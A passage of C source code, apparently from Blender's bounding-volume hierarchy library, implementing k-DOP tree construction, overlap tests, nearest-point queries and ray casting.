bv[2*i + 1] = -FLT_MAX;
}
for (j = start; j < end; j++)
{
// for all Axes.
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
newmin = tree->nodes[j]->bv[(2 * i)];
if ((newmin < bv[(2 * i)]))
bv[(2 * i)] = newmin;
newmax = tree->nodes[j]->bv[(2 * i) + 1];
if ((newmax > bv[(2 * i) + 1]))
bv[(2 * i) + 1] = newmax;
}
}
}
// only supports x,y,z axis in the moment
// but we should use a plain and simple function here for speed sake
static char get_largest_axis(float *bv)
{
float middle_point[3];
middle_point[0] = (bv[1]) - (bv[0]); // x axis
middle_point[1] = (bv[3]) - (bv[2]); // y axis
middle_point[2] = (bv[5]) - (bv[4]); // z axis
if (middle_point[0] > middle_point[1])
{
if (middle_point[0] > middle_point[2])
return 1; // max x axis
else
return 5; // max z axis
}
else
{
if (middle_point[1] > middle_point[2])
return 3; // max y axis
else
return 5; // max z axis
}
}
// bottom-up update of bvh node BV
// join the children on the parent BV
static void node_join(BVHTree *tree, BVHNode *node)
{
int i, j;
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[2*i] = FLT_MAX;
node->bv[2*i + 1] = -FLT_MAX;
}
for (i = 0; i < tree->tree_type; i++)
{
if (node->children[i])
{
for (j = tree->start_axis; j < tree->stop_axis; j++)
{
// update minimum
if (node->children[i]->bv[(2 * j)] < node->bv[(2 * j)])
node->bv[(2 * j)] = node->children[i]->bv[(2 * j)];
// update maximum
if (node->children[i]->bv[(2 * j) + 1] > node->bv[(2 * j) + 1])
node->bv[(2 * j) + 1] = node->children[i]->bv[(2 * j) + 1];
}
}
else
break;
}
}
/*
* Debug and information functions
*/
#if 0
static void bvhtree_print_tree(BVHTree *tree, BVHNode *node, int depth)
{
int i;
for(i=0; i<depth; i++) printf(" ");
printf(" - %d (%ld): ", node->index, node - tree->nodearray);
for(i=2*tree->start_axis; i<2*tree->stop_axis; i++)
printf("%.3f ", node->bv[i]);
printf("\n");
for(i=0; i<tree->tree_type; i++)
if(node->children[i])
bvhtree_print_tree(tree, node->children[i], depth+1);
}
static void bvhtree_info(BVHTree *tree)
{
printf("BVHTree info\n");
printf("tree_type = %d, axis = %d, epsilon = %f\n", tree->tree_type, tree->axis, tree->epsilon);
printf("nodes = %d, branches = %d, leafs = %d\n", tree->totbranch + tree->totleaf, tree->totbranch, tree->totleaf);
printf("Memory per node = %ldbytes\n", sizeof(BVHNode) + sizeof(BVHNode*)*tree->tree_type + sizeof(float)*tree->axis);
printf("BV memory = %dbytes\n", MEM_allocN_len(tree->nodebv));
printf("Total memory = %ldbytes\n", sizeof(BVHTree)
+ MEM_allocN_len(tree->nodes)
+ MEM_allocN_len(tree->nodearray)
+ MEM_allocN_len(tree->nodechild)
+ MEM_allocN_len(tree->nodebv)
);
// bvhtree_print_tree(tree, tree->nodes[tree->totleaf], 0);
}
#endif
#if 0
static void verify_tree(BVHTree *tree)
{
int i, j, check = 0;
// check the pointer list
for(i = 0; i < tree->totleaf; i++)
{
if(tree->nodes[i]->parent == NULL)
printf("Leaf has no parent: %d\n", i);
else
{
for(j = 0; j < tree->tree_type; j++)
{
if(tree->nodes[i]->parent->children[j] == tree->nodes[i])
check = 1;
}
if(!check)
{
printf("Parent child relationship doesn't match: %d\n", i);
}
check = 0;
}
}
// check the leaf list
for(i = 0; i < tree->totleaf; i++)
{
if(tree->nodearray[i].parent == NULL)
printf("Leaf has no parent: %d\n", i);
else
{
for(j = 0; j < tree->tree_type; j++)
{
if(tree->nodearray[i].parent->children[j] == &tree->nodearray[i])
check = 1;
}
if(!check)
{
printf("Parent child relationship doesn't match: %d\n", i);
}
check = 0;
}
}
printf("branches: %d, leafs: %d, total: %d\n", tree->totbranch, tree->totleaf, tree->totbranch + tree->totleaf);
}
#endif
//Helper data and structures to build a min-leaf generalized implicit tree
//This code can be easily reduced (basicly this is only method to calculate pow(k, n) in O(1).. and stuff like that)
typedef struct BVHBuildHelper
{
int tree_type; //
int totleafs; //
int leafs_per_child [32]; //Min number of leafs that are archievable from a node at depth N
int branches_on_level[32]; //Number of nodes at depth N (tree_type^N)
int remain_leafs; //Number of leafs that are placed on the level that is not 100% filled
} BVHBuildHelper;
static void build_implicit_tree_helper(BVHTree *tree, BVHBuildHelper *data)
{
int depth = 0;
int remain;
int nnodes;
data->totleafs = tree->totleaf;
data->tree_type= tree->tree_type;
//Calculate the smallest tree_type^n such that tree_type^n >= num_leafs
for(
data->leafs_per_child[0] = 1;
data->leafs_per_child[0] < data->totleafs;
data->leafs_per_child[0] *= data->tree_type
);
data->branches_on_level[0] = 1;
//We could stop the loop first (but I am lazy to find out when)
for(depth = 1; depth < 32; depth++)
{
data->branches_on_level[depth] = data->branches_on_level[depth-1] * data->tree_type;
data->leafs_per_child [depth] = data->leafs_per_child [depth-1] / data->tree_type;
}
remain = data->totleafs - data->leafs_per_child[1];
nnodes = (remain + data->tree_type - 2) / (data->tree_type - 1);
data->remain_leafs = remain + nnodes;
}
// return the min index of all the leafs archivable with the given branch
static int implicit_leafs_index(BVHBuildHelper *data, int depth, int child_index)
{
int min_leaf_index = child_index * data->leafs_per_child[depth-1];
if(min_leaf_index <= data->remain_leafs)
return min_leaf_index;
else if(data->leafs_per_child[depth])
return data->totleafs - (data->branches_on_level[depth-1] - child_index) * data->leafs_per_child[depth];
else
return data->remain_leafs;
}
/**
* Generalized implicit tree build
*
* An implicit tree is a tree where its structure is implied, thus there is no need to store child pointers or indexs.
* Its possible to find the position of the child or the parent with simple maths (multiplication and adittion). This type
* of tree is for example used on heaps.. where node N has its childs at indexs N*2 and N*2+1.
*
* Altought in this case the tree type is general.. and not know until runtime.
* tree_type stands for the maximum number of childs that a tree node can have.
* All tree types >= 2 are supported.
*
* Advantages of the used trees include:
* - No need to store child/parent relations (they are implicit);
* - Any node child always has an index greater than the parent;
* - Brother nodes are sequencial in memory;
*
*
* Some math relations derived for general implicit trees:
*
* K = tree_type, ( 2 <= K )
* ROOT = 1
* N child of node A = A * K + (2 - K) + N, (0 <= N < K)
*
* Util methods:
* TODO...
* (looping elements, knowing if its a leaf or not.. etc...)
*/
// This functions returns the number of branches needed to have the requested number of leafs.
static int implicit_needed_branches(int tree_type, int leafs)
{
return MAX2(1, (leafs + tree_type - 3) / (tree_type-1) );
}
/*
* This function handles the problem of "sorting" the leafs (along the split_axis).
*
* It arranges the elements in the given partitions such that:
* - any element in partition N is less or equal to any element in partition N+1.
* - if all elements are diferent all partition will get the same subset of elements
* as if the array was sorted.
*
* partition P is described as the elements in the range ( nth[P] , nth[P+1] ]
*
* TODO: This can be optimized a bit by doing a specialized nth_element instead of K nth_elements
*/
static void split_leafs(BVHNode **leafs_array, int *nth, int partitions, int split_axis)
{
int i;
for(i=0; i < partitions-1; i++)
{
if(nth[i] >= nth[partitions])
break;
partition_nth_element(leafs_array, nth[i], nth[partitions], nth[i+1], split_axis);
}
}
/*
* This functions builds an optimal implicit tree from the given leafs.
* Where optimal stands for:
* - The resulting tree will have the smallest number of branches;
* - At most only one branch will have NULL childs;
* - All leafs will be stored at level N or N+1.
*
* This function creates an implicit tree on branches_array, the leafs are given on the leafs_array.
*
* The tree is built per depth levels. First branchs at depth 1.. then branches at depth 2.. etc..
* The reason is that we can build level N+1 from level N witouth any data dependencies.. thus it allows
* to use multithread building.
*
* To archieve this is necessary to find how much leafs are accessible from a certain branch, BVHBuildHelper
* implicit_needed_branches and implicit_leafs_index are auxiliar functions to solve that "optimal-split".
*/
static void non_recursive_bvh_div_nodes(BVHTree *tree, BVHNode *branches_array, BVHNode **leafs_array, int num_leafs)
{
int i;
const int tree_type = tree->tree_type;
const int tree_offset = 2 - tree->tree_type; //this value is 0 (on binary trees) and negative on the others
const int num_branches= implicit_needed_branches(tree_type, num_leafs);
BVHBuildHelper data;
int depth;
// set parent from root node to NULL
BVHNode *tmp = branches_array+0;
tmp->parent = NULL;
//Most of bvhtree code relies on 1-leaf trees having at least one branch
//We handle that special case here
if(num_leafs == 1)
{
BVHNode *root = branches_array+0;
refit_kdop_hull(tree, root, 0, num_leafs);
root->main_axis = get_largest_axis(root->bv) / 2;
root->totnode = 1;
root->children[0] = leafs_array[0];
root->children[0]->parent = root;
return;
}
branches_array--; //Implicit trees use 1-based indexs
build_implicit_tree_helper(tree, &data);
//Loop tree levels (log N) loops
for(i=1, depth = 1; i <= num_branches; i = i*tree_type + tree_offset, depth++)
{
const int first_of_next_level = i*tree_type + tree_offset;
const int end_j = MIN2(first_of_next_level, num_branches + 1); //index of last branch on this level
int j;
//Loop all branches on this level
#pragma omp parallel for private(j) schedule(static)
for(j = i; j < end_j; j++)
{
int k;
const int parent_level_index= j-i;
BVHNode* parent = branches_array + j;
int nth_positions[ MAX_TREETYPE + 1];
char split_axis;
int parent_leafs_begin = implicit_leafs_index(&data, depth, parent_level_index);
int parent_leafs_end = implicit_leafs_index(&data, depth, parent_level_index+1);
//This calculates the bounding box of this branch
//and chooses the largest axis as the axis to divide leafs
refit_kdop_hull(tree, parent, parent_leafs_begin, parent_leafs_end);
split_axis = get_largest_axis(parent->bv);
//Save split axis (this can be used on raytracing to speedup the query time)
parent->main_axis = split_axis / 2;
//Split the childs along the split_axis, note: its not needed to sort the whole leafs array
//Only to assure that the elements are partioned on a way that each child takes the elements
//it would take in case the whole array was sorted.
//Split_leafs takes care of that "sort" problem.
nth_positions[ 0] = parent_leafs_begin;
nth_positions[tree_type] = parent_leafs_end;
for(k = 1; k < tree_type; k++)
{
int child_index = j * tree_type + tree_offset + k;
int child_level_index = child_index - first_of_next_level; //child level index
nth_positions[k] = implicit_leafs_index(&data, depth+1, child_level_index);
}
split_leafs(leafs_array, nth_positions, tree_type, split_axis);
//Setup children and totnode counters
//Not really needed but currently most of BVH code relies on having an explicit children structure
for(k = 0; k < tree_type; k++)
{
int child_index = j * tree_type + tree_offset + k;
int child_level_index = child_index - first_of_next_level; //child level index
int child_leafs_begin = implicit_leafs_index(&data, depth+1, child_level_index);
int child_leafs_end = implicit_leafs_index(&data, depth+1, child_level_index+1);
if(child_leafs_end - child_leafs_begin > 1)
{
parent->children[k] = branches_array + child_index;
parent->children[k]->parent = parent;
}
else if(child_leafs_end - child_leafs_begin == 1)
{
parent->children[k] = leafs_array[ child_leafs_begin ];
parent->children[k]->parent = parent;
}
else
break;
parent->totnode = k+1;
}
}
}
}
/*
* BLI_bvhtree api
*/
BVHTree *BLI_bvhtree_new(int maxsize, float epsilon, char tree_type, char axis)
{
BVHTree *tree;
int numnodes, i;
// theres not support for trees below binary-trees :P
if(tree_type < 2)
return NULL;
if(tree_type > MAX_TREETYPE)
return NULL;
tree = (BVHTree *)MEM_callocN(sizeof(BVHTree), "BVHTree");
//tree epsilon must be >= FLT_EPSILON
//so that tangent rays can still hit a bounding volume..
//this bug would show up when casting a ray aligned with a kdop-axis and with an edge of 2 faces
epsilon = MAX2(FLT_EPSILON, epsilon);
if(tree)
{
tree->epsilon = epsilon;
tree->tree_type = tree_type;
tree->axis = axis;
if(axis == 26)
{
tree->start_axis = 0;
tree->stop_axis = 13;
}
else if(axis == 18)
{
tree->start_axis = 7;
tree->stop_axis = 13;
}
else if(axis == 14)
{
tree->start_axis = 0;
tree->stop_axis = 7;
}
else if(axis == 8) // AABB
{
tree->start_axis = 0;
tree->stop_axis = 4;
}
else if(axis == 6) // OBB
{
tree->start_axis = 0;
tree->stop_axis = 3;
}
else
{
MEM_freeN(tree);
return NULL;
}
//Allocate arrays
numnodes = maxsize + implicit_needed_branches(tree_type, maxsize) + tree_type;
tree->nodes = (BVHNode **)MEM_callocN(sizeof(BVHNode *)*numnodes, "BVHNodes");
if(!tree->nodes)
{
MEM_freeN(tree);
return NULL;
}
tree->nodebv = (float*)MEM_callocN(sizeof(float)* axis * numnodes, "BVHNodeBV");
if(!tree->nodebv)
{
MEM_freeN(tree->nodes);
MEM_freeN(tree);
}
tree->nodechild = (BVHNode**)MEM_callocN(sizeof(BVHNode*) * tree_type * numnodes, "BVHNodeBV");
if(!tree->nodechild)
{
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodes);
MEM_freeN(tree);
}
tree->nodearray = (BVHNode *)MEM_callocN(sizeof(BVHNode)* numnodes, "BVHNodeArray");
if(!tree->nodearray)
{
MEM_freeN(tree->nodechild);
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodes);
MEM_freeN(tree);
return NULL;
}
//link the dynamic bv and child links
for(i=0; i< numnodes; i++)
{
tree->nodearray[i].bv = tree->nodebv + i * axis;
tree->nodearray[i].children = tree->nodechild + i * tree_type;
}
}
return tree;
}
void BLI_bvhtree_free(BVHTree *tree)
{
if(tree)
{
MEM_freeN(tree->nodes);
MEM_freeN(tree->nodearray);
MEM_freeN(tree->nodebv);
MEM_freeN(tree->nodechild);
MEM_freeN(tree);
}
}
void BLI_bvhtree_balance(BVHTree *tree)
{
int i;
BVHNode* branches_array = tree->nodearray + tree->totleaf;
BVHNode** leafs_array = tree->nodes;
//This function should only be called once (some big bug goes here if its being called more than once per tree)
assert(tree->totbranch == 0);
//Build the implicit tree
non_recursive_bvh_div_nodes(tree, branches_array, leafs_array, tree->totleaf);
//current code expects the branches to be linked to the nodes array
//we perform that linkage here
tree->totbranch = implicit_needed_branches(tree->tree_type, tree->totleaf);
for(i = 0; i < tree->totbranch; i++)
tree->nodes[tree->totleaf + i] = branches_array + i;
build_skip_links(tree, tree->nodes[tree->totleaf], NULL, NULL);
//bvhtree_info(tree);
}
int BLI_bvhtree_insert(BVHTree *tree, int index, float *co, int numpoints)
{
int i;
BVHNode *node = NULL;
// insert should only possible as long as tree->totbranch is 0
if(tree->totbranch > 0)
return 0;
if(tree->totleaf+1 >= MEM_allocN_len(tree->nodes)/sizeof(*(tree->nodes)))
return 0;
// TODO check if have enough nodes in array
node = tree->nodes[tree->totleaf] = &(tree->nodearray[tree->totleaf]);
tree->totleaf++;
create_kdop_hull(tree, node, co, numpoints, 0);
node->index= index;
// inflate the bv with some epsilon
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[(2 * i)] -= tree->epsilon; // minimum
node->bv[(2 * i) + 1] += tree->epsilon; // maximum
}
return 1;
}
// call before BLI_bvhtree_update_tree()
int BLI_bvhtree_update_node(BVHTree *tree, int index, float *co, float *co_moving, int numpoints)
{
int i;
BVHNode *node= NULL;
// check if index exists
if(index > tree->totleaf)
return 0;
node = tree->nodearray + index;
create_kdop_hull(tree, node, co, numpoints, 0);
if(co_moving)
create_kdop_hull(tree, node, co_moving, numpoints, 1);
// inflate the bv with some epsilon
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
node->bv[(2 * i)] -= tree->epsilon; // minimum
node->bv[(2 * i) + 1] += tree->epsilon; // maximum
}
return 1;
}
// call BLI_bvhtree_update_node() first for every node/point/triangle
void BLI_bvhtree_update_tree(BVHTree *tree)
{
//Update bottom=>top
//TRICKY: the way we build the tree all the childs have an index greater than the parent
//This allows us todo a bottom up update by starting on the biger numbered branch
BVHNode** root = tree->nodes + tree->totleaf;
BVHNode** index = tree->nodes + tree->totleaf + tree->totbranch-1;
for (; index >= root; index--)
node_join(tree, *index);
}
float BLI_bvhtree_getepsilon(BVHTree *tree)
{
return tree->epsilon;
}
/*
* BLI_bvhtree_overlap
*/
// overlap - is it possbile for 2 bv's to collide ?
static int tree_overlap(BVHNode *node1, BVHNode *node2, int start_axis, int stop_axis)
{
float *bv1 = node1->bv;
float *bv2 = node2->bv;
float *bv1_end = bv1 + (stop_axis<<1);
bv1 += start_axis<<1;
bv2 += start_axis<<1;
// test all axis if min + max overlap
for (; bv1 != bv1_end; bv1+=2, bv2+=2)
{
if ((*(bv1) > *(bv2 + 1)) || (*(bv2) > *(bv1 + 1)))
return 0;
}
return 1;
}
static void traverse(BVHOverlapData *data, BVHNode *node1, BVHNode *node2)
{
int j;
if(tree_overlap(node1, node2, data->start_axis, data->stop_axis))
{
// check if node1 is a leaf
if(!node1->totnode)
{
// check if node2 is a leaf
if(!node2->totnode)
{
if(node1 == node2)
{
return;
}
if(data->i >= data->max_overlap)
{
// try to make alloc'ed memory bigger
data->overlap = realloc(data->overlap, sizeof(BVHTreeOverlap)*data->max_overlap*2);
if(!data->overlap)
{
printf("Out of Memory in traverse\n");
return;
}
data->max_overlap *= 2;
}
// both leafs, insert overlap!
data->overlap[data->i].indexA = node1->index;
data->overlap[data->i].indexB = node2->index;
data->i++;
}
else
{
for(j = 0; j < data->tree2->tree_type; j++)
{
if(node2->children[j])
traverse(data, node1, node2->children[j]);
}
}
}
else
{
for(j = 0; j < data->tree2->tree_type; j++)
{
if(node1->children[j])
traverse(data, node1->children[j], node2);
}
}
}
return;
}
BVHTreeOverlap *BLI_bvhtree_overlap(BVHTree *tree1, BVHTree *tree2, unsigned int *result)
{
int j;
unsigned int total = 0;
BVHTreeOverlap *overlap = NULL, *to = NULL;
BVHOverlapData **data;
// check for compatibility of both trees (can't compare 14-DOP with 18-DOP)
if((tree1->axis != tree2->axis) && (tree1->axis == 14 || tree2->axis == 14) && (tree1->axis == 18 || tree2->axis == 18))
return NULL;
// fast check root nodes for collision before doing big splitting + traversal
if(!tree_overlap(tree1->nodes[tree1->totleaf], tree2->nodes[tree2->totleaf], MIN2(tree1->start_axis, tree2->start_axis), MIN2(tree1->stop_axis, tree2->stop_axis)))
return NULL;
data = MEM_callocN(sizeof(BVHOverlapData *)* tree1->tree_type, "BVHOverlapData_star");
for(j = 0; j < tree1->tree_type; j++)
{
data[j] = (BVHOverlapData *)MEM_callocN(sizeof(BVHOverlapData), "BVHOverlapData");
// init BVHOverlapData
data[j]->overlap = (BVHTreeOverlap *)malloc(sizeof(BVHTreeOverlap)*MAX2(tree1->totleaf, tree2->totleaf));
data[j]->tree1 = tree1;
data[j]->tree2 = tree2;
data[j]->max_overlap = MAX2(tree1->totleaf, tree2->totleaf);
data[j]->i = 0;
data[j]->start_axis = MIN2(tree1->start_axis, tree2->start_axis);
data[j]->stop_axis = MIN2(tree1->stop_axis, tree2->stop_axis );
}
#pragma omp parallel for private(j) schedule(static)
for(j = 0; j < MIN2(tree1->tree_type, tree1->nodes[tree1->totleaf]->totnode); j++)
{
traverse(data[j], tree1->nodes[tree1->totleaf]->children[j], tree2->nodes[tree2->totleaf]);
}
for(j = 0; j < tree1->tree_type; j++)
total += data[j]->i;
to = overlap = (BVHTreeOverlap *)MEM_callocN(sizeof(BVHTreeOverlap)*total, "BVHTreeOverlap");
for(j = 0; j < tree1->tree_type; j++)
{
memcpy(to, data[j]->overlap, data[j]->i*sizeof(BVHTreeOverlap));
to+=data[j]->i;
}
for(j = 0; j < tree1->tree_type; j++)
{
free(data[j]->overlap);
MEM_freeN(data[j]);
}
MEM_freeN(data);
(*result) = total;
return overlap;
}
//Determines the nearest point of the given node BV. Returns the squared distance to that point.
static float calc_nearest_point(const float *proj, BVHNode *node, float *nearest)
{
int i;
const float *bv = node->bv;
//nearest on AABB hull
for(i=0; i != 3; i++, bv += 2)
{
if(bv[0] > proj[i])
nearest[i] = bv[0];
else if(bv[1] < proj[i])
nearest[i] = bv[1];
else
nearest[i] = proj[i];
}
/*
//nearest on a general hull
VECCOPY(nearest, data->co);
for(i = data->tree->start_axis; i != data->tree->stop_axis; i++, bv+=2)
{
float proj = dot_v3v3( nearest, KDOP_AXES[i]);
float dl = bv[0] - proj;
float du = bv[1] - proj;
if(dl > 0)
{
VECADDFAC(nearest, nearest, KDOP_AXES[i], dl);
}
else if(du < 0)
{
VECADDFAC(nearest, nearest, KDOP_AXES[i], du);
}
}
*/
return len_squared_v3v3(proj, nearest);
}
typedef struct NodeDistance
{
BVHNode *node;
float dist;
} NodeDistance;
#define NodeDistance_priority(a,b) ( (a).dist < (b).dist )
// TODO: use a priority queue to reduce the number of nodes looked on
static void dfs_find_nearest_dfs(BVHNearestData *data, BVHNode *node)
{
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata , node->index, data->co, &data->nearest);
else
{
data->nearest.index = node->index;
data->nearest.dist = calc_nearest_point(data->proj, node, data->nearest.co);
}
}
else
{
//Better heuristic to pick the closest node to dive on
int i;
float nearest[3];
if(data->proj[ node->main_axis ] <= node->children[0]->bv[node->main_axis*2+1])
{
for(i=0; i != node->totnode; i++)
{
if( calc_nearest_point(data->proj, node->children[i], nearest) >= data->nearest.dist) continue;
dfs_find_nearest_dfs(data, node->children[i]);
}
}
else
{
for(i=node->totnode-1; i >= 0 ; i--)
{
if( calc_nearest_point(data->proj, node->children[i], nearest) >= data->nearest.dist) continue;
dfs_find_nearest_dfs(data, node->children[i]);
}
}
}
}
static void dfs_find_nearest_begin(BVHNearestData *data, BVHNode *node)
{
float nearest[3], sdist;
sdist = calc_nearest_point(data->proj, node, nearest);
if(sdist >= data->nearest.dist) return;
dfs_find_nearest_dfs(data, node);
}
#if 0
static void NodeDistance_push_heap(NodeDistance *heap, int heap_size)
PUSH_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size)
static void NodeDistance_pop_heap(NodeDistance *heap, int heap_size)
POP_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size)
//NN function that uses an heap.. this functions leads to an optimal number of min-distance
//but for normal tri-faces and BV 6-dop.. a simple dfs with local heuristics (as implemented
//in source/blender/blenkernel/intern/shrinkwrap.c) works faster.
//
//It may make sense to use this function if the callback queries are very slow.. or if its impossible
//to get a nice heuristic
//
//this function uses "malloc/free" instead of the MEM_* because it intends to be openmp safe
static void bfs_find_nearest(BVHNearestData *data, BVHNode *node)
{
int i;
NodeDistance default_heap[DEFAULT_FIND_NEAREST_HEAP_SIZE];
NodeDistance *heap=default_heap, current;
int heap_size = 0, max_heap_size = sizeof(default_heap)/sizeof(default_heap[0]);
float nearest[3];
int callbacks = 0, push_heaps = 0;
if(node->totnode == 0)
{
dfs_find_nearest_dfs(data, node);
return;
}
current.node = node;
current.dist = calc_nearest_point(data->proj, node, nearest);
while(current.dist < data->nearest.dist)
{
// printf("%f : %f\n", current.dist, data->nearest.dist);
for(i=0; i< current.node->totnode; i++)
{
BVHNode *child = current.node->children[i];
if(child->totnode == 0)
{
callbacks++;
dfs_find_nearest_dfs(data, child);
}
else
{
//adjust heap size
if(heap_size >= max_heap_size
&& ADJUST_MEMORY(default_heap, (void**)&heap, heap_size+1, &max_heap_size, sizeof(heap[0])) == FALSE)
{
printf("WARNING: bvh_find_nearest got out of memory\n");
if(heap != default_heap)
free(heap);
return;
}
heap[heap_size].node = current.node->children[i];
heap[heap_size].dist = calc_nearest_point(data->proj, current.node->children[i], nearest);
if(heap[heap_size].dist >= data->nearest.dist) continue;
heap_size++;
NodeDistance_push_heap(heap, heap_size);
// PUSH_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size);
push_heaps++;
}
}
if(heap_size == 0) break;
current = heap[0];
NodeDistance_pop_heap(heap, heap_size);
// POP_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size);
heap_size--;
}
// printf("hsize=%d, callbacks=%d, pushs=%d\n", heap_size, callbacks, push_heaps);
if(heap != default_heap)
free(heap);
}
#endif
int BLI_bvhtree_find_nearest(BVHTree *tree, const float *co, BVHTreeNearest *nearest, BVHTree_NearestPointCallback callback, void *userdata)
{
int i;
BVHNearestData data;
BVHNode* root = tree->nodes[tree->totleaf];
//init data to search
data.tree = tree;
data.co = co;
data.callback = callback;
data.userdata = userdata;
for(i = data.tree->start_axis; i != data.tree->stop_axis; i++)
{
data.proj[i] = dot_v3v3(data.co, KDOP_AXES[i]);
}
if(nearest)
{
memcpy( &data.nearest , nearest, sizeof(*nearest) );
}
else
{
data.nearest.index = -1;
data.nearest.dist = FLT_MAX;
}
//dfs search
if(root)
dfs_find_nearest_begin(&data, root);
//copy back results
if(nearest)
{
memcpy(nearest, &data.nearest, sizeof(*nearest));
}
return data.nearest.index;
}
/*
* Raycast - BLI_bvhtree_ray_cast
*
* raycast is done by performing a DFS on the BVHTree and saving the closest hit
*/
//Determines the distance that the ray must travel to hit the bounding volume of the given node
static float ray_nearest_hit(BVHRayCastData *data, float *bv)
{
int i;
float low = 0, upper = data->hit.dist;
for(i=0; i != 3; i++, bv += 2)
{
if(data->ray_dot_axis[i] == 0.0f)
{
//axis aligned ray
if(data->ray.origin[i] < bv[0] - data->ray.radius
|| data->ray.origin[i] > bv[1] + data->ray.radius)
return FLT_MAX;
}
else
{
float ll = (bv[0] - data->ray.radius - data->ray.origin[i]) / data->ray_dot_axis[i];
float lu = (bv[1] + data->ray.radius - data->ray.origin[i]) / data->ray_dot_axis[i];
if(data->ray_dot_axis[i] > 0.0f)
{
if(ll > low) low = ll;
if(lu < upper) upper = lu;
}
else
{
if(lu > low) low = lu;
if(ll < upper) upper = ll;
}
if(low > upper) return FLT_MAX;
}
}
return low;
}
//Determines the distance that the ray must travel to hit the bounding volume of the given node
//Based on Tactical Optimization of Ray/Box Intersection, by Graham Fyffe
//[http://tog.acm.org/resources/RTNews/html/rtnv21n1.html#art9]
//
//TODO this doens't has data->ray.radius in consideration
static float fast_ray_nearest_hit(const BVHRayCastData *data, const BVHNode *node)
{
const float *bv = node->bv;
float dist;
float t1x = (bv[data->index[0]] - data->ray.origin[0]) * data->idot_axis[0];
float t2x = (bv[data->index[1]] - data->ray.origin[0]) * data->idot_axis[0];
float t1y = (bv[data->index[2]] - data->ray.origin[1]) * data->idot_axis[1];
float t2y = (bv[data->index[3]] - data->ray.origin[1]) * data->idot_axis[1];
float t1z = (bv[data->index[4]] - data->ray.origin[2]) * data->idot_axis[2];
float t2z = (bv[data->index[5]] - data->ray.origin[2]) * data->idot_axis[2];
if(t1x > t2y || t2x < t1y || t1x > t2z || t2x < t1z || t1y > t2z || t2y < t1z) return FLT_MAX;
if(t2x < 0.0f || t2y < 0.0f || t2z < 0.0f) return FLT_MAX;
if(t1x > data->hit.dist || t1y > data->hit.dist || t1z > data->hit.dist) return FLT_MAX;
dist = t1x;
if (t1y > dist) dist = t1y;
if (t1z > dist) dist = t1z;
return dist;
}
static void dfs_raycast(BVHRayCastData *data, BVHNode *node)
{
int i;
//ray-bv is really fast.. and simple tests revealed its worth to test it
//before calling the ray-primitive functions
/* XXX: temporary solution for particles untill fast_ray_nearest_hit supports ray.radius */
float dist = (data->ray.radius > 0.0f) ? ray_nearest_hit(data, node->bv) : fast_ray_nearest_hit(data, node);
if(dist >= data->hit.dist) return;
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata, node->index, &data->ray, &data->hit);
else
{
data->hit.index = node->index;
data->hit.dist = dist;
VECADDFAC(data->hit.co, data->ray.origin, data->ray.direction, dist);
}
}
else
{
//pick loop direction to dive into the tree (based on ray direction and split axis)
if(data->ray_dot_axis[ (int)node->main_axis ] > 0.0f)
{
for(i=0; i != node->totnode; i++)
{
dfs_raycast(data, node->children[i]);
}
}
else
{
for(i=node->totnode-1; i >= 0; i--)
{
dfs_raycast(data, node->children[i]);
}
}
}
}
#if 0
static void iterative_raycast(BVHRayCastData *data, BVHNode *node)
{
while(node)
{
float dist = fast_ray_nearest_hit(data, node);
if(dist >= data->hit.dist)
{
node = node->skip[1];
continue;
}
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata, node->index, &data->ray, &data->hit);
else
{
data->hit.index = node->index;
data->hit.dist = dist;
VECADDFAC(data->hit.co, data->ray.origin, data->ray.direction, dist);
}
node = node->skip[1];
}
else
{
node = node->children[0];
}
}
}
#endif
int BLI_bvhtree_ray_cast(BVHTree *tree, const float *co, const float *dir, float radius, BVHTreeRayHit *hit, BVHTree_RayCastCallback callback, void *userdata)
{
int i;
BVHRayCastData data;
BVHNode * root = tree->nodes[tree->totleaf];
data.tree = tree;
data.callback = callback;
data.userdata = userdata;
VECCOPY(data.ray.origin, co);
VECCOPY(data.ray.direction, dir);
data.ray.radius = radius;
normalize_v3(data.ray.direction);
for(i=0; i<3; i++)
{
data.ray_dot_axis[i] = dot_v3v3(data.ray.direction, KDOP_AXES[i]);
data.idot_axis[i] = 1.0f / data.ray_dot_axis[i];
if(fabsf(data.ray_dot_axis[i]) < FLT_EPSILON)
{
data.ray_dot_axis[i] = 0.0;
}
data.index[2*i] = data.idot_axis[i] < 0.0f ? 1 : 0;
data.index[2*i+1] = 1 - data.index[2*i];
data.index[2*i] += 2*i;
data.index[2*i+1] += 2*i;
}
if(hit)
memcpy( &data.hit, hit, sizeof(*hit) );
else
{
data.hit.index = -1;
data.hit.dist = FLT_MAX;
}
if(root)
{
dfs_raycast(&data, root);
// iterative_raycast(&data, root);
}
if(hit)
memcpy( hit, &data.hit, sizeof(*hit) );
return data.hit.index;
}
float BLI_bvhtree_bb_raycast(float *bv, float *light_start, float *light_end, float *pos)
{
BVHRayCastData data;
float dist = 0.0;
data.hit.dist = FLT_MAX;
// get light direction
data.ray.direction[0] = light_end[0] - light_start[0];
data.ray.direction[1] = light_end[1] - light_start[1];
data.ray.direction[2] = light_end[2] - light_start[2];
data.ray.radius = 0.0;
data.ray.origin[0] = light_start[0];
data.ray.origin[1] = light_start[1];
data.ray.origin[2] = light_start[2];
normalize_v3(data.ray.direction);
VECCOPY(data.ray_dot_axis, data.ray.direction);
dist = ray_nearest_hit(&data, bv);
if(dist > 0.0f)
{
VECADDFAC(pos, light_start, data.ray.direction, dist);
}
return dist;
}
/*
* Range Query - as request by broken :P
*
* Allocs and fills an array with the indexs of node that are on the given spherical range (center, radius)
* Returns the size of the array.
*/
typedef struct RangeQueryData
{
BVHTree *tree;
const float *center;
float radius; //squared radius
int hits;
BVHTree_RangeQuery callback;
void *userdata;
} RangeQueryData;
static void dfs_range_query(RangeQueryData *data, BVHNode *node)
{
if(node->totnode == 0)
{
#if 0 /*UNUSED*/
//Calculate the node min-coords (if the node was a point then this is the point coordinates)
